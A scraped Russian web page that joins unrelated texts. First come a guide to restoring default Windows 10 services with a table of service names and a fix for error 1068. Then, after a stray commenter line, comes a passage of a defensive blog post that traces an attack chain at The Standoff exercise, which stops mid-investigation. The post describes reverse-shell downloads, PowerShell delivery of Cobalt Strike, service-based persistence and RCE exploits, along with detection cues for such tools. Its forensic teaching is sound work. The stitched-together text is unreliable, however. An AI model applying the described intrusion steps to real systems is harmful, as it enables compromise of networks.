Служба узла hv что это за служба

Как восстановить службы по умолчанию в Windows 10

В данной статье показаны действия, с помощью которых можно восстановить службы (службу) по умолчанию в операционной системе Windows 10.

Служба — это особый тип приложения, которое выполняется в фоновом режиме и не имеет пользовательского интерфейса. Службы обеспечивают выполнение основных и вспомогательных функций операционной системы.

Далее в статье представлено описание служб, и самое важное — это файлы реестра с помощью которых можно полностью восстановить любую из служб по умолчанию и её параметры. Это может быть удобно, если служба была удалена по ошибке, отсутствует или её свойства были установлены неправильно.

Чтобы восстановить службы по умолчанию, необходимо войти в систему с правами администратора.

Все службы и их параметры находятся в разделе реестра по следующему пути:

Данный способ восстановления служб (службы) по умолчанию предполагает внесение изменений в системный реестр Windows с помощью файлов реестра.

Прежде чем вносить какие-либо изменения в реестр, настоятельно рекомендуется создать точку восстановления системы.

Как восстановить службы по умолчанию в Windows 10

1. Скачайте файл реестра для восстановления необходимой службы, для этого в таблице ниже щелкните левой кнопкой мыши на имя службы в виде ссылки в столбце Отображаемое имя .

В открывшемся контекстном меню выберите « Сохранить ссылку как… ». Далее укажите место, куда нужно сохранить файл реестра, например, на рабочем столе. Тип файла — Registration Entries , после сохранения будет отражаться следующим образом.

Повторите все описанные выше шаги, если вы хотите восстановить другую службу.

Таблица служб по умолчанию Windows 10

Чтобы скачать соответствующий файл, нажмите на ссылку с именем:

Отображаемое имя	Имя службы
Установщик ActiveX (AxInstSV)	AxInstSV
Служба маршрутизатора AllJoyn	AJRouter
Готовность приложений	AppReadiness
Удостоверение приложения	AppIDSvc
Сведения о приложении	Appinfo
Служба шлюза уровня приложения	ALG
Управление приложениями	AppMgmt
Служба развертывания AppX (AppXSVC)	AppXSvc
Служба AssignedAccessManager	AssignedAccessManagerSvc
Автоматическое обновление часового пояса	tzautoupdate
Фоновая интеллектуальная служба передачи (BITS)	BITS
Служба инфраструктуры фоновых задач	BrokerInfrastructure
Служба базовой фильтрации	BFE
Служба шифрования дисков BitLocker	BDESVC
Служба модуля архивации на уровне блоков	wbengine
Служба звукового шлюза Bluetooth	BTAGService
Служба беспроводной связи Bluetooth	BthHFSrv
Служба поддержки Bluetooth	bthserv
BranchCache	PeerDistSvc
Служба диспетчера доступа к возможностям	camsvc
Распространение сертификата	CertPropSvc
Служба лицензий клиента (ClipSVC)	ClipSVC
Система событий COM+	EventSystem
Системное приложение COM+	COMSysApp
Браузер компьютеров	Browser
Служба платформы подключенных устройств	CDPSvc
Функциональные возможности для подключенных пользователей и телеметрия	DiagTrack
CoreMessaging	CoreMessagingRegistrar
Диспетчер учетных данных	VaultSvc
Службы криптографии	CryptSvc
Служба совместного доступа к данным	DsSvc
Служба публикации сбора данных	DcpSvc
Использование данных	DusmSvc
Модуль запуска процессов DCOM-сервера	DcomLaunch
Оптимизация доставки	DoSvc
Служба сопоставления устройств	DeviceAssociationService
Служба установки устройств	DeviceInstall
Служба регистрации управления устройством	DmEnrollmentSvc
Диспетчер настройки устройств	DsmSvc
Брокер фонового обнаружения DevQuery	DevQueryBroker
DHCP-клиент	Dhcp
Diagnostic Execution Service	diagsvc
Служба политики диагностики	DPS
Узел службы диагностики	WdiServiceHost
Узел системы диагностики	WdiSystemHost
Клиент отслеживания изменившихся связей	TrkWks
Координатор распределенных транзакций	MSDTC
Служба маршрутизации push-сообщений на основе протокола WAP (Wireless Application Protocol) для управления устройствами	dmwappushservice
DNS-клиент	Dnscache
Диспетчер скачанных карт	MapsBroker
Встроенный режим	embeddedmode
Шифрованная файловая система (EFS)	EFS
Служба управления корпоративными приложениями	EntAppSvc
ESIF Upper Framework Service	esifsvc
Расширяемый протокол проверки подлинности (EAP)	Eaphost
Факс	Fax
Служба истории файлов	fhsvc
Хост поставщика функции обнаружения	fdPHost
Публикация ресурсов обнаружения функции	FDResPub
Служба географического положения	lfsvc
GraphicsPerfSvc	GraphicsPerfSvc
Клиент групповой политики	gpsvc
Прослушиватель домашней группы	HomeGroupListener
Поставщик домашней группы	HomeGroupProvider
Host Guardian Client Service	HgClientService
Host Network Service	hns
Доступ к HID-устройствам	hidserv
Служба узла HV	HvHost
Служба обмена данными (Hyper-V)	vmickvpexchange
Интерфейс гостевой службы Hyper-V	vmicguestinterface
Служба завершения работы в качестве гостя (Hyper-V)	vmicshutdown
Служба пульса (Hyper-V)	vmicheartbeat
Hyper-V Host Compute Service	vmcompute
Служба Hyper-V PowerShell Direct	vmicvmsession
Служба виртуализации удаленных рабочих столов Hyper-V	vmicrdv
Служба синхронизации времени Hyper-V	vmictimesync
Hyper-V Virtual Machine Management	vmms
Служба запросов на теневое копирование томов Hyper-V	vmicvss
Модули ключей IPsec для обмена ключами в Интернете и протокола IP с проверкой подлинности	IKEEXT
Служба монитора инфракрасной связи	irmon
Обнаружение интерактивных служб	UI0Detect
Общий доступ к подключению к Интернету (ICS)	SharedAccess
Вспомогательная служба IP	iphlpsvc
Служба настройки преобразования IP-адресов	IpxlatCfgSvc
Агент политики IPsec	PolicyAgent
KtmRm для координатора распределенных транзакций	KtmRm
Тополог канального уровня	lltdsvc
Диспетчер локальных сеансов	LSM
LPA Service	wlpasvc
Стандартная служба сборщика центра диагностики Microsoft (R)	diagnosticshub.standardcollector.service
Помощник по входу в учетную запись Майкрософт	wlidsvc
Microsoft App-V Client	AppVClient
Служба инициатора Майкрософт iSCSI	MSiSCSI
Служба Microsoft Passport	NgcSvc
Контейнер службы Microsoft Passport	NgcCtnrSvc
Программный поставщик теневого копирования (Microsoft)	swprv
SMP дисковых пространств (Майкрософт)	smphost
Служба маршрутизатора SMS Microsoft Windows	SmsRouter
Проверка подлинности на основе физических параметров	NaturalAuthentication
Служба общего доступа к портам Net.Tcp	NetTcpPortSharing
Сетевой вход в систему	Netlogon
Автоматическая настройка сетевых устройств	NcdAutoSetup
Посредник подключений к сети	NcbService
Сетевые подключения	Netman
Помощник по подключению к сети	NcaSvc
Служба списка сетей	netprofm
Служба сведений о подключенных сетях	NlaSvc
Служба настройки сети	NetSetupSvc
Служба интерфейса сохранения сети	nsi
Автономные файлы	CscService
Оптимизация дисков	defragsvc
Диспетчер платежей и NFC/защищенных элементов	SEMgrSvc
Протокол PNRP	PNRPsvc
Группировка сетевых участников	p2psvc
Диспетчер удостоверения сетевых участников	p2pimsvc
Хост библиотеки счетчика производительности	PerfHost
Журналы и оповещения производительности	pla
Телефонная связь	PhoneSvc
Plug and Play	PlugPlay
Служба публикации имен компьютеров PNRP	PNRPAutoReg
Служба перечислителя переносных устройств	WPDBusEnum
Питание	Power
Диспетчер печати	Spooler
Расширения и уведомления для принтеров	PrintNotify
Поддержка элемента панели управления «Отчеты о проблемах и их решениях»	wercplsupport
Служба помощника по совместимости программ	PcaSvc
Quality Windows Audio Video Experience	QWAVE
Служба управления радио	RmSvc
Диспетчер автоматических подключений удаленного доступа	RasAuto
Диспетчер подключений удаленного доступа	RasMan
Настройка сервера удаленных рабочих столов	SessionEnv
Службы удаленных рабочих столов	TermService
Перенаправитель портов пользовательского режима служб удаленных рабочих столов	UmRdpService
Удаленный вызов процедур (RPC)	RpcSs
Локатор удаленного вызова процедур (RPC)	RpcLocator
Удаленный реестр	RemoteRegistry
Служба демонстрации магазина	RetailDemo
Маршрутизация и удаленный доступ	RemoteAccess
Сопоставитель конечных точек RPC	RpcEptMapper
Вторичный вход в систему	seclogon
Служба SSTP	SstpSvc
Диспетчер учетных записей безопасности	SamSs
Центр обеспечения безопасности	wscsvc
Служба данных датчиков	SensorDataService
Служба наблюдения за датчиками	SensrSvc
Служба датчиков	SensorService
Сервер	LanmanServer
Shared PC Account Manager	shpamsvc
Определение оборудования оболочки	ShellHWDetection
Смарт-карта	SCardSvr
Служба перечисления устройств чтения смарт-карт	ScDeviceEnum
Политика удаления смарт-карт	SCPolicySvc
Ловушка SNMP	SNMPTRAP
Защита программного обеспечения	sppsvc
Служба пространственных данных	SharedRealitySvc
Быстрая проверка	svsvc
Обнаружение SSDP	SSDPSRV
Служба репозитория состояний	StateRepository
События получения неподвижных изображений	WiaRpc
Служба хранилища	StorSvc
Управление уровнями хранилища	TieringEngineService
SysMain	SysMain
Служба уведомления о системных событиях	SENS
Брокер системных событий	SystemEventsBroker
Планировщик заданий	Schedule
Модуль поддержки NetBIOS через TCP/IP	lmhosts
Телефония	TapiSrv
Темы	Themes
Сервер моделей данных плиток	tiledatamodelsvc
Брокер времени	TimeBrokerSvc
Диспетчер учетных веб-записей	TokenBroker
Служба сенсорной клавиатуры и панели рукописного ввода	TabletInputService
Update Orchestrator Service	UsoSvc
Узел универсальных PNP-устройств	upnphost
Служба виртуализации взаимодействия с пользователем	UevAgentService
Диспетчер пользователей	UserManager
Служба профилей пользователей	ProfSvc
Виртуальный диск	vds
Теневое копирование тома	VSS
Служба кошелька	WalletService
WarpJITSvc	WarpJITSvc
Диспетчер учетных веб-записей	TokenBroker
Веб-клиент	WebClient
Служба диспетчера подключений служб Wi-Fi Direct	WFDSConMgrSvc
Windows Audio	Audiosrv
Средство построения конечных точек Windows Audio	AudioEndpointBuilder
Программа архивации данных	SDRSVC
Биометрическая служба Windows	WbioSrvc
Сервер кадров камеры Windows	FrameServer
Немедленные подключения Windows — регистратор настройки	wcncsvc
Диспетчер подключений Windows	Wcmsvc
Служба Advanced Threat Protection в Защитнике Windows	Sense
Служба проверки сети Windows Defender Antivirus	WdNisSvc
Антивирусная программа «Защитника Windows»	WinDefend
Брандмауэр Защитника Windows	mpssvc
Служба «Безопасность Windows»	SecurityHealthService
Windows Driver Foundation — User-mode Driver Framework	wudfsvc
Служба узла поставщика шифрования Windows	WEPHOSTSVC
Служба регистрации ошибок Windows	WerSvc
Сборщик событий Windows	Wecsvc
Журнал событий Windows	EventLog
Служба кэша шрифтов Windows	FontCache
Служба загрузки изображений Windows (WIA)	stisvc
Служба предварительной оценки Windows	wisvc
Установщик Windows	msiserver
Служба Windows License Manager	LicenseManager
Инструментарий управления Windows	Winmgmt
Служба общих сетевых ресурсов проигрывателя Windows Media	WMPNetworkSvc
Служба Windows Mobile Hotspot	icssvc
Служба восприятия Windows	spectrum
Кэш шрифтов Windows Presentation Foundation 3.0.0.0	FontCache3.0.0.0
Служба системы push-уведомлений Windows	WpnService
Служба удаленного управления Windows (WS-Management)	WinRM
Windows Search	WSearch
Служба установки Microsoft Store	InstallService
Служба времени Windows	W32Time
Центр обновления Windows	wuauserv
Служба автоматического обнаружения веб-прокси WinHTTP	WinHttpAutoProxySvc
Проводная автонастройка	dot3svc
Служба автонастройки WLAN	WlanSvc
Адаптер производительности WMI	wmiApSrv
Рабочие папки	workfolderssvc
Рабочая станция	LanmanWorkstation
Автонастройка WWAN	WwanSvc
Xbox Accessory Management Service	XboxGipSvc
Xbox Game Monitoring	xbgm
Диспетчер проверки подлинности Xbox Live	XblAuthManager
Сохранение игр на Xbox Live	XblGameSave
Сетевая служба Xbox Live	XboxNetApiSvc

Ошибка 1068 — не удалось запустить дочернюю службу или группу

Если при запуске какой-либо программы, выполнения действия в Windows или при входе в систему вы видите сообщение об ошибке 1068 «Не удалось запустить дочернюю службу или группу», это говорит о том, что по какой-то причине необходимая для выполнения действия служба отключена или не может быть запущена.

В этой инструкции подробно о распространенных вариантах ошибки 1068 (Windows Audio, при подключениях и создании локальной сети и т.п.) и о том, как исправить возникшую проблему, даже если ваш случай не из числа распространенных. Сама же ошибка может появиться в Windows 10, 8 и Windows 7 — то есть во всех последних версиях ОС от Microsoft.

Не удалось запустить дочернюю службу — распространенные варианты ошибки 1068

Для начала о самых часто встречающихся вариантах ошибки и быстрые пути исправить их. Необходимые для исправления действия будут выполняться в управлении службами Windows.

Для того, чтобы открыть «Службы» в Windows 10, 8 и Windows 7, нажмите клавиши Win+R (где Win — клавиша с эмблемой ОС) и введите services.msc после чего нажмите Enter. Откроется окно со списком служб и их состоянием.

Для изменения параметров любой из служб, просто дважды кликните по ней, в следующем окне вы сможете изменить тип запуска (например, включить «Автоматически») и запустить или остановить службу. Если опция «Запустить» не доступна, то сначала нужно изменить тип запуска на «Вручную» или «Автоматически», применить настройки и уже потом запускать службу (но она может не запуститься и в этом случае, если зависима еще от каких-то отключенных в настоящий момент служб).

Если проблема не была решена сразу (или запускать службы не получается), то после изменения типа запуска всех необходимых служб и сохранения настроек попробуйте также перезагрузить компьютер.

Ошибка 1068 службы Windows Audio

Если запустить дочернюю службу не удалось при запуске службы Windows Audio, проверьте состояние следующих служб:

• Питание (тип запуска по умолчанию — Автоматически)
• Планировщик классов мультимедиа (данная служба может отсутствовать в списке, тогда для вашей ОС неприменимо, пропустите).
• Удаленный вызов процедур RPC (по умолчанию — Автоматически).
• Средство построения конечных точек Windows Audio (тип запуска — Автоматически).

После запуска указанных служб и возвращения типа запуска по умолчанию, служба Windows Audio должна перестать выдавать указанную ошибку.

Не удалось запустить дочернюю службу при действиях с сетевыми подключениями

Следующий распространенный вариант — сообщение об ошибке 1068 при каких-либо действиях с сетью: предоставлением общего доступа к сети, настройке домашней группы, подключению к Интернету.

В описываемой ситуации проверьте работу следующих служб:

• Диспетчер подключений Windows (Автоматически)
• Удаленный вызов процедур RPC (Автоматически)
• Служба автонастройки WLAN (Автоматически)
• Автонастройка WWAN (Вручную, для беспроводных подключений и Интернета по мобильной сети).
• Служба шлюза уровня приложения (Вручную)
• Служба сведений о подключенных сетях (Автоматически)
• Диспетчер подключений удаленного доступа (по умолчанию – вручную)
• Диспетчер автоматических подключений удаленного доступа (Вручную)
• Служба SSTP (Вручную)
• Маршрутизация и удаленный доступ (по умолчанию бывает отключена, но попробуйте запустить, может помочь в исправлении ошибки).
• Диспетчер удостоверений сетевых участников (Вручную)
• Протокол PNRP (Вручную)
• Телефония (Вручную)
• Plug and Play (Вручную)

В качестве отдельного действия при неполадках с сетевыми службами при подключении к Интернету (ошибка 1068 и ошибка 711 при непосредственно подключении в Windows 7) можно попробовать следующее:

1. Остановите службу «Диспетчера удостоверений сетевых участников» (не меняйте тип запуска).
2. В папке C:\ Windows\ serviceProfiles\ LocalService\ AppData\ Roaming\ PeerNetworking удалите файл idstore.sst при его наличии.

После этого перезагрузите компьютер.

Поиск необходимых для исправления ошибки 1068 служб вручную на примере диспетчера печати и брандмауэра

Поскольку все возможные варианты появления ошибки с запуском дочерних служб я предусмотреть не могу, показываю, как можно попробовать самостоятельно исправить ошибку 1068 вручную.

Этот способ должен подойти для большинства случаев появления проблемы в Windows 10 — Windows 7: и для ошибок брандмауэра, Hamachi, диспетчера печати и для других, менее часто встречающихся вариантов.

В сообщение об ошибке 1068 всегда присутствует название службы, вызвавшей эту ошибку. В списке служб Windows найдите это название, после чего кликните по ней правой кнопкой мыши и выберите «Свойства».

После этого перейдите на вкладку «Зависимости». Например, для службы Диспетчер печати мы увидим, что требуется «Удаленный вызов процедур», а для брандмауэра требуется «Служба базовой фильтрации», для которой, в свою очередь, тот же «Удаленный вызов процедур».

Когда необходимые службы стали известны, пробуем включить их. Если тип запуска по умолчанию неизвестен — пробуем «Автоматически» с последующей перезагрузкой компьютера.

Примечание: такие службы, как «Питание» и «Plug and Play» не указываются в зависимостях, но могут быть критичными для работы, всегда обращайте на них внимание при возникновении ошибок запуска служб.

А вдруг и это будет интересно:

• Лучшие бесплатные программы для Windows
• Как отключить или удалить Связь с телефоном в Windows 11 и 10
• Ошибка 0xc000001d при запуске игры или программы — как исправить?
• Ключ восстановления BitLocker в Windows — способы посмотреть
• User OOBE Broker — что это за процесс в Windows 11 и 10
• Ошибка 0x803F8001 в Microsoft Store, играх и приложениях — как исправить?

• Windows 11
• Windows 10
• Android
• Загрузочная флешка
• Лечение вирусов
• Восстановление данных
• Установка с флешки
• Настройка роутера
• Всё про Windows
• В контакте
• Одноклассники

Владимир 16.12.2018 в 18:59

Письмо ценой катастрофы: расследуем атаку на The Standoff, используя продукты Positive Technologies

Привет! В мае прошел очередной, уже 11-й, PHDays, а вместе с ним и The Standoff, и мы, как обычно, не остались без кейсов интересных атак. В этот раз мы решили не описывать отдельные техники и тактики по матрице MITRE ATT&CK, ведь ни одна атака не возникает на пустом месте: всегда есть конкретный вектор проникновения в систему, путь продвижения по инфраструктуре и в конечном счете реализованное недопустимое событие. Предлагаем сосредоточиться на этом, так что приготовьтесь к полноценному расследованию!

В течение четырех дней кибербитвы Государство F подвергалось атакам со всех сторон. В мероприятии принимали участие 17 команд атакующих, под их натиском пали нефтегазовая, энергетическая, транспортная отрасли, в сеть были слиты персональные данные сотрудников, украдены конфиденциальные документы, целые сети были заражены вирусами-шифровальщиками. Но, конечно, самыми впечатляющими были атаки на автоматизированные системы управления технологическим процессом (АСУ ТП). Нет, не потому, что они заставляют макет ожить, а потому, что атаки на промышленные системы в реальной жизни разрушительны, несут огромные риски и могут привести к человеческим жертвам. Также такие атаки сложнее в реализации: промышленные системы вынесены в отдельный изолированный сегмент, доступ к которому ограничен. Кроме того, реализация недопустимых событий в промышленном сегменте, по правилам нашей кибербитвы, приносила команде атакующих больше всего очков.

The Standoff — это самая масштабная в мире открытая кибербитва. Главной темой учений, прошедших в мае, стал эффект бабочки: зрители и участники битвы увидели, как реализация недопустимого события в одной отрасли экономики может повлиять на другие и на все государство в целом. На площадке в Москве было построено виртуальное Государство F с тремя отраслями производства: черной металлургией, электроэнергетикой и нефтяной промышленностью. Внутри каждой отрасли экономики были представлены взаимосвязанные объекты и смоделированы производственные процессы, начиная от добычи ресурсов и заканчивая поставкой продукции конечным потребителям. Также в экономике Государства F было представлено несколько других сегментов (транспорт, банковская система и ЖКХ), каждый из которых тоже состоял из набора объектов. Чтобы найти слабые места в защите этих объектов, управляемых системами, использующимися в реальной жизни, собрались 157 исследователей безопасности из 17 команд. Атакующие искали уязвимости и пытались реализовать инциденты, например, вызвать коллапс в аэропорту или остановить работу нефтезавода. За четыре дня The Standoff атакующие реализовали недопустимые события 63 раза, 30 из них были уникальными.

Напомним, что традиционно в противостоянии принимают участие и команды защиты, которые наблюдают за происходящим на The Standoff, используя продукты Positive Technologies: продукт для глубокого анализа трафика PT NAD (PT Network Attack Discovery), систему мониторинга событий ИБ и выявления инцидентов в реальном времени MaxPatrol SIEM, межсетевой экран уровня приложений PT Application Firewall, систему анализа технологического трафика PT ISIM (PT Industrial Security Incident Manager) и песочницу PT Sandbox. Сегодня мы, PT Expert Security Center, заглянем в каждый из них и продемонстрируем, как совокупность продуктов позволяет воссоздать полную цепочку действий атакующих. Также мы покажем, на что именно специалистам SOC (security operation center) нужно обращать внимание, чтобы заметить и остановить хакеров еще на подходе к критичным системам, пока они не успели реализовать недопустимое для компании событие.

Отправная точка расследования

Так как телетрапом управляет SCADA-система (supervisory control and data acquisition — диспетчерское управление и сбор данных), мы начнем наш разбор с анализа технологического трафика с помощью PT ISIM и посмотрим, что продукт смог зафиксировать:

• трапу была отправлена команда с IP-адреса 10.156.22.134 — узла оператора SCADA-системы;
• удаленное подключение по RDP к узлу оператора было осуществлено за несколько минут до аварии с IP-адреса 10.156.22.25.

Наш следующий шаг — выяснить, кто и откуда получил доступ по RDP к узлу оператора. В этом нам поможет MaxPatrol SIEM: отфильтруем нужный нам узел и посмотрим входы по RDP (RemoteInteractive, события msgid = 4624 и logon_type = 10). Сгруппируем их по именам пользователей, которые осуществляли вход, и посмотрим адреса подключения.

Мы видим, что кроме оператора никто не заходил по RDP на узел. А еще обратим внимание, что все RDP-сессии осуществлены с одного IP-адреса (10.156.22.25). Самая первая успешная RDP-сессия была установлена еще накануне вечером. Проанализировав активность на узле airportboarding, мы не обнаружили ничего интересного: не было ни сканов, ни принесенного инструментария для атак на промышленные сети — ничего. Можем предположить, что, войдя по RDP, атакующие увидели открытую консоль управления телетрапом и, дождавшись момента посадки пассажиров, отодвинули его. В этом случае разумнее всего перейти к анализу происходящего со следующим узлом (10.156.22.25), с которого был получен доступ к узлу оператора SCADA-системы, и поискать артефакты действий атакующего там.

Анализируя события с comp-54.hv-logistics.stf (10.156.22.25), мы можем выяснить, какие процессы обращались к порту 3389 на узле оператора SCADA-системы (10.156.22.134). Мы видим, что за интересующий нас промежуток времени к порту обращались два процесса: nmap.exe и lsysnetworkrestricted.exe. Первый — это общеизвестный инструмент для сканирования и поиска открытых портов, который активно используют в атаках на инфраструктуру и пентестеры, и реальные злоумышленники. Назначение второго процесса непонятно. Тут может быть несколько вариантов: либо это кастомизированный клиент RDP, либо инструментарий для туннелирования трафика, либо другой сетевой сканер. Давайте разбираться.

Посмотрим, что это за файл lsysnetworkrestricted.exe и откуда он взялся. Начнем с события запуска процесса (msgid in [1, 4688]). Стоит обратить внимание на то, что у файла отсутствуют метаинформация и исходное имя (original_name), а еще он был запущен от имени NT Authority\System. Файл располагается в папке C:\Windows\System32, но не относится к Windows. Мы можем сделать вывод, что этот файл создан атакующими и они смогли получить системные привилегии на узле comp-54.hv-logistics.stf (10.156.22.25).

Далее мы находим событие создания файла. Проанализировав события c msgid = 11 (Sysmon), мы обнаруживаем, что этот исполняемый файл был создан процессом powershell.exe с PID (process identifier) 2224. PowerShell — один из незаменимых инструментов атакующих, поэтому Microsoft предоставили аналитикам SOC отличные события его аудита. Зная PID родительского процесса powershell.exe, мы анализируем события 4103 и 4104 (журнал Microsoft-Windows-PowerShell) и обнаруживаем скачивание файла с помощью командлета Invoke-WebRequest. Также мы видим, что команда выполнялась от имени пользователя r_flores_admin.

Теперь в центре нашего внимания оказывается пользователь r_flores_admin. Проделываем трюк, который мы уже использовали ранее: смотрим, откуда, как и когда был осуществлен вход от имени этого пользователя. Оказывается, что это вновь RDP-сессия с узла rdg.hv-logistivs.stf (10.156.26.21). Но пока не будем забегать вперед и смотреть, что же происходило на том узле, — остановимся на самом факте входа. Из этого события мы можем извлечь крайне полезную информацию — ID сеанса. Он позволит нам собрать всю активность пользователя в рамках этой RDP-сессии, что бывает полезно при реагировании на инцидент. Мы можем посмотреть запущенные в рамках сессии процессы, найти возможные артефакты атакующих и потенциальные способы закрепления в системе.

Мы обнаружили, что в рамках этой сессии r_flores_admin создал сервис с исполняемым файлом WWIHost.exe, тем самым повысив свои привилегии до SYSTEM. Имя службы было выбрано такое, чтобы она была похожа на системную и не выделялась (спасибо за то, что пытаетесь скрываться!). Обратите внимание на поля object.property и object.type: их значения свидетельствуют о том, что служба стартует автоматически (тип 2); то есть атакующие не только повысили права, но и закрепились в системе. Ранее нам уже встречался процесс wwihost.exe, но в качестве родительского для lsysnetworkrestricted.exe. То есть он был запущен от SYSTEM, так как наследует эти права от wwihost.exe, запущенного как сервис.

Очень часто хакерские инструментарии оставляют за собой следы, по которым можно классифицировать то или иное ПО.

Например, модуль Impacket smbexec использует технику service execution для выполнения команд с повышенными привилегиями. Он создает в целевой системе службу, имя которой зафиксировано автором в коде скрипта (BTOBTO). Так как иногда атакующие забывают поменять эту строку (а иногда ленятся), это может стать отличным индикатором использования Impacket smbexec.

По таким следам правила корреляций MaxPatrol SIEM и правила PT NAD умеют обнаруживать большую часть популярных (и не очень) инструментов, используемых в атаках: модули фреймворков Metasploit Framework, Koadic и Cobalt Strike, инструменты из набора Impacket, Mimikatz, Rubeus и множество других.

Аналитики SOC, возлюбите msgid = 1 (Sysmon)! В отличие от штатного логирования старта процесса в Windows (msgid = 4688), Sysmon предоставляет больше информации и дает больше контекста. Например, ничем не примечательный 1.exe оказывается эксплойтом для свежей уязвимости в RPC (CVE-2022-26809). Значения метаинформации и исходного имени файла задаются на этапе сборки исполняемого файла, но если атакующие используют готовый инструмент и просто переименовывают его исполняемый файл, чтобы скрыться, то Sysmon позволит вам легко это вычислить.

Серверный сегмент

Итак, вернемся к нашей цепочке. Расследование приводит нас на узел rdg.hv-logistivs.stf (10.156.26.21), с которого авторизовывался r_flores_admin. Так как на практике сегмент АСУ ТП защищается особо тщательно, получить доступ к узлам операторов бывает непросто, дотянуться до них по сети можно далеко не отовсюду. Обычно сетевой связанностью с узлами операторов АСУ ТП обладают несколько инфраструктурных серверов (KSC, SCCM) и, возможно, несколько компьютеров из сегмента администраторов. В нашем случае такой лазейкой в сегмент SCADA стал сервер Remote Desktop Gateway.

По процедуре, описанной выше, находим процесс, осуществлявший удаленный вход по RDP (msgid in [3,5156] and dst.port = 3389). Вы знаете, что делать дальше: msgid in [1, 4688]. Смотрим, что это за процесс, кто его запустил, вытаскиваем subject.account.session_id и анализируем активность, предшествующую перемещению на следующий узел в цепочке атаки.

Нам бы тоже хотелось, чтобы атакующие показывали неизвестные, новые и интересные техники атак. Но, как и в жизни, есть подготовленный инструментарий и работающие стратегии. Поэтому и в реальности при перемещении атакующих от узла к узлу мы видим похожие события. А значит, и наши техники расследования часто оказываются однотипными.

Тут мы видим стандартное обращение от процесса mstsc.exe, родителем которого является explorer.exe. Значит, у атакующих снова был интерактивный доступ.

У нас появляется новый скомпрометированный пользователь e_puckett (который пришел с адреса 10.156.26.34). Посмотрим сработавшие правила корреляции в рамках его сессии. PowerShell, который открывает соединение на внешний адрес? Чаще всего это говорит о потенциальном соединении с С2-сервером (command and control) атакующих или же о скачивании файла (в некоторых случаях — об использовании фреймворков для проведения разведки или атак на Active Directory, например PowerSploit, BloodHound). И почти всегда это говорит о том, что с узлом что-то нечисто.

Мы нашли адрес, который потенциально принадлежит атакующим. В реальной жизни с ним мы делаем три вещи:

1. Блокируем все соединения из нашей сети на этот адрес.
2. Добавляем в IoC, чтобы при попытке подключения к указанному адресу любого узла в нашей инфраструктуре мы сразу же получали сообщение от систем защиты о критическом инциденте с высокой важностью, максимально быстро стартовали расследование и реагирование на инцидент.
3. Проводим ретроспективный анализ и находим все узлы, которые могли оказаться под контролем атакующих (сейчас мы этого делать не будем, чтобы не заспойлерить итоги расследования, а посмотрим на этот адрес только в рамках текущего узла).

Изучим, какие события на узле связаны с указанным адресом. Так как это powershell.exe, то нам снова оказываются полезны события с msgid = 4104: видим Invoke-Expression (IEX), net.webclient, downloadstring, а затем много строк base64-encoded. Даже если вы не встречали подобного в жизни, несложно догадаться, что тут происходит. А если сталкивались с таким, то точно должны знать, что разбитый на несколько событий Base64 характерен для запуска полезной нагрузки PowerShell и доставки Cobalt Strike Beacon на узел.

Дальнейший анализ показал, что активность атакующих на узле была минимальной. Мы увидели запуск nmap и ping до нескольких узлов из разных сетей (в том числе до сегментов АСУ ТП и сегмента администраторов). Пользователь e_puckett не имеет прав локального администратора, но при этом мы также не увидели каких-либо попыток повысить привилегии. Это может говорить о том, что узел rdg.hv-logistics.stf (10.156.26.21) был интересен атакующим только из-за доступа практически в любой уголок сети компании. Закрепились атакующие через добавление своей полезной нагрузки в автозагрузку. Beacon Cobalt Strike использовался исключительно для проксирования трафика до интересующих хакеров целей.

Так что, следуя по цепочке перемещения хакеров, переходим к узлу iTop с адресом 10.156.26.34 (рис. 10), с которого атакующие заходили по RDP на rdg.hv-logistics.stf (10.156.26.21) под пользователем e_puckett. Находим обращения к порту 3389 от файла /tmp/la, и на самом деле в найденных событиях подозрительно все: скрипт из папки /tmp/ открывает соединение к порту 3389, еще и запущен пользователем www-data. Выглядит подозрительно, не так ли?

Выполнение команд от имени пользователя www-data говорит о потенциальной RCE- уязвимости (remote code execution) в веб-интерфейсе (возможно, с использованием веб-шелла). Каждый пентестер, даже далеко не самый опытный, знает, что при эксплуатации RCE-уязвимости в веб-приложении он получает права того пользователя, от имени которого запущен веб-сервис. Иногда ленивые администраторы серверов делают атакующим подарок в виде прав root, но в большинстве случаев это все же www-data, bitrix, сonfluence (привет, CVE-2022-26134) или пользователь, не обладающий высокими правами или даже правом на интерактивный вход.

Нужно понять, откуда взялся этот файл la. По строке запуска /tmp/la находим скачивание пользователем www-data через wget, chmod + x на /tmp/la (дает файлу право на исполнение) — обратный шелл до управляющего сервера. Довольно стандартный сценарий при эксплуатации веб-уязвимости. Аналитики SOC, обращайте внимание на то, какие команды выполняют пользователи — демоны веб-сервисов. Если внезапно www-data начинает выяснять, кто он (whoami) и где он (hostname), то следует повнимательней присмотреться к его активности.

Кстати, домен lg4.ptsecurity.net мы уже встречали ранее на узле comp-54.hv-logistics.stf (рис. 5).

С помощью SIEM можно узнать контекст того, какие команды выполнялись, но продукты этого класса не могут сказать, что находится внутри исполняемого файла или файла скрипта. Нам остается только строить предположения. Или. Или нам на помощь приходит PT NAD, который умеет извлекать из трафика передаваемые файлы и сразу отправлять их на анализ в PT Sandbox (обратите внимание, около имени передаваемого файла появляется индикатор того, что в результате анализа файл был признан вредоносным). Стоит сделать оговорку, что это не сработает с шифрованным трафиком (HTTPS, SSH), но в MaxPatrol SIEM мы видим, что для передачи использовался HTTP (без SSL). Можем легко найти скачивание файла lg4.lin, который сохранили в /tmp/la.

PT NAD поможет ответить на вопрос, какая уязвимость была проэксплуатирована на iTop. Проанализировав сработавшие правила, мы выяснили, что используется уязвимая версия iTop 2.4.1, эксплойт к которой позволяет удаленно выполнить код (CVE-2018-10642). Можем определить название веб-шелла, который был использован атакующими, команды, которые они через него выполняли, и их вывод. Но самая важная информация — это адрес, с которого была произведена эксплуатация уязвимости, а именно узел comp-65.hv-logistics.stf (10.156.24.219).

Получение учетных данных

Продолжаем наше расследование и перемещаемся на узел comp-65.hv-logistics.stf (10.156.24.219), с которого атакующие прорвались в серверный сегмент. Задав узкий промежуток времени, в котором была зафиксирована эксплуатация уязвимости, мы видим обращение на порт 80 сервиса iTop от 1.exe.

Проверим, от имени какого пользователя был запущен процесс с предполагаемым эксплойтом. Очень важно проводить такой анализ, чтобы понять, какими правами обладает процесс, ведь права наследуются от пользователя. Если с пользователем SYSTEM все понятно, то по имени w_pitts мы не можем с ходу сказать, является ли он локальным администратором на узле comp-65.hv-logistics.stf (10.156.24.219). Один из способов это выяснить — проверить, регистрируются ли вместе со входом событие msgid = 4672 (присвоение специальных привилегий при входе). Мы не нашли таких событий, а значит, атакующим пришлось проявить изобретательность, чтобы получить максимальные права на узле.

